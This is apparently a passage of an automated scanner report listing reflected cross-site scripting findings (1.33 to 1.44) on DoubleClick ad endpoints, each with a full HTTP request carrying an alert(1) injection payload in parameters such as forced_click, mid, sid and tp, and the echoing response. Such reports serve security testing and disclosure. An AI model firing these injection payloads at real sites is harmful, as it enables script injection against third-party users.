Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5979
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 01:44:38 GMT
Expires: Mon, 14 Feb 2011 01:44:38 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
3aae/7/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=86415'-alert(1)-'b736f4a5c56http://lp2.turbotax.com/ty10/bn/gdestp?cid=bn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_&priorityCode=4654700000\">
...[SNIP]...

1.33. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [forced_click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7261e"-alert(1)-"ebc0bfc526f was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=7261e"-alert(1)-"ebc0bfc526f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6299
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 01:44:34 GMT
Expires: Mon, 14 Feb 2011 01:44:34 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:42:54 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
3aae/7/7d/%2a/q%3B234150289%3B1-0%3B0%3B57930397%3B4307-300/250%3B39601762/39619549/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=7261e"-alert(1)-"ebc0bfc526fhttp://lp2.turbotax.com/ty10/oadisp/ph-1/control_gps_f?cid=bn_vc_f_anb_rncpaut_CRFfgg_ppk_300x250&priorityCode=4654700000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var
...[SNIP]...

1.34. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f824'-alert(1)-'78ddba2521c was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=67f824'-alert(1)-'78ddba2521c&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=67f824'-alert(1)-'78ddba2521c&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000\">
...[SNIP]...

1.35. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d629c"-alert(1)-"dabc82fe9a7 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6d629c"-alert(1)-"dabc82fe9a7&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6320

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:49:06 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/f%3B234150289%3B0-0%3B0%3B57930397%3B4307-300/250%3B39601731/39619518/11%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6d629c"-alert(1)-"dabc82fe9a7&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/scroll_f%3Fcid%3Dbn_vc_f_anb_rncpaut_ScrFr_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClickTa
...[SNIP]...

1.36. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [mid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4aaee'-alert(1)-'64021cf45b7 was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=5115034aaee'-alert(1)-'64021cf45b7&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:43:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6001

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:38:21 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
//ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/u%3B234150289%3B2-0%3B0%3B57930397%3B4307-300/250%3B39865159/39882946/3%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=5115034aaee'-alert(1)-'64021cf45b7&m=6&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/jnsfr%3Fcid%3Dbn_vc_f_anb_rncpaut_Frjns_ppk_300x250_%26priorityCode%3D4654700000\">
...[SNIP]...

1.37. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [mid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13a69"-alert(1)-"441cf269a49 was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=51150313a69"-alert(1)-"441cf269a49&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:43:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6320

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:49:06 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
/ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/f%3B234150289%3B0-0%3B0%3B57930397%3B4307-300/250%3B39601731/39619518/11%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=51150313a69"-alert(1)-"441cf269a49&m=6&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/scroll_f%3Fcid%3Dbn_vc_f_anb_rncpaut_ScrFr_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlCli
...[SNIP]...

1.38. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca60b"-alert(1)-"9ecef699118 was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627ca60b"-alert(1)-"9ecef699118&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627ca60b"-alert(1)-"9ecef699118&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var
...[SNIP]...

1.39. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dcb10'-alert(1)-'29a07cd16fe was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627dcb10'-alert(1)-'29a07cd16fe&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627dcb10'-alert(1)-'29a07cd16fe&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000\">
...[SNIP]...

1.40. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The crawler filed this finding under the sz parameter, but the request below shows the marker appended to the cid value of the click URL (cid=274614 followed by the payload); that is the value copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f21e"-alert(1)-"c1a80b55da6 was submitted there. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=2746144f21e"-alert(1)-"c1a80b55da6&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:43:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6001

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:38:21 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
cape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/u%3B234150289%3B2-0%3B0%3B57930397%3B4307-300/250%3B39865159/39882946/3%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=2746144f21e"-alert(1)-"c1a80b55da6&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/jnsfr%3Fcid%3Dbn_vc_f_anb_rncpaut_Frjns_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClic
...[SNIP]...

1.41. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The crawler filed this finding under the sz parameter, but the request below shows the marker appended to the cid value of the click URL (cid=274614 followed by the payload); that is the value copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92ab7'-alert(1)-'6d6e3b013b3 was submitted there. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=27461492ab7'-alert(1)-'6d6e3b013b3&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:43:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6341

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:42:54 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ref=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/q%3B234150289%3B1-0%3B0%3B57930397%3B4307-300/250%3B39601762/39619549/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=27461492ab7'-alert(1)-'6d6e3b013b3&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/control_gps_f%3Fcid%3Dbn_vc_f_anb_rncpaut_CRFfgg_ppk_300x250%26priorityCode%3D4654700000\">
...[SNIP]...

1.42. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [tp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3faad"-alert(1)-"dcba53557ab was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=83faad"-alert(1)-"dcba53557ab&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
lick%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=83faad"-alert(1)-"dcba53557ab&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "
...[SNIP]...

1.43. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [tp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22cba'-alert(1)-'0a0ea759385 was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=822cba'-alert(1)-'0a0ea759385&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6341

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:42:54 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
lick%3Bh%3Dv8/3aae/f/7d/%2a/q%3B234150289%3B1-0%3B0%3B57930397%3B4307-300/250%3B39601762/39619549/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=822cba'-alert(1)-'0a0ea759385&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/control_gps_f%3Fcid%3Dbn_vc_f_anb_rncpaut_CRFfgg_ppk_300x250%26priorityCode%3D4654700000\">
...[SNIP]...

1.44. http://ad.doubleclick.net/adj/uk.reuters/news/lifestyle/article [type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/uk.reuters/news/lifestyle/article

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9eaaa'%3balert(1)//62bc3773dd1 was submitted in the type parameter. This input was echoed as 9eaaa';alert(1)//62bc3773dd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/uk.reuters/news/lifestyle/article;type=9eaaa'%3balert(1)//62bc3773dd1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
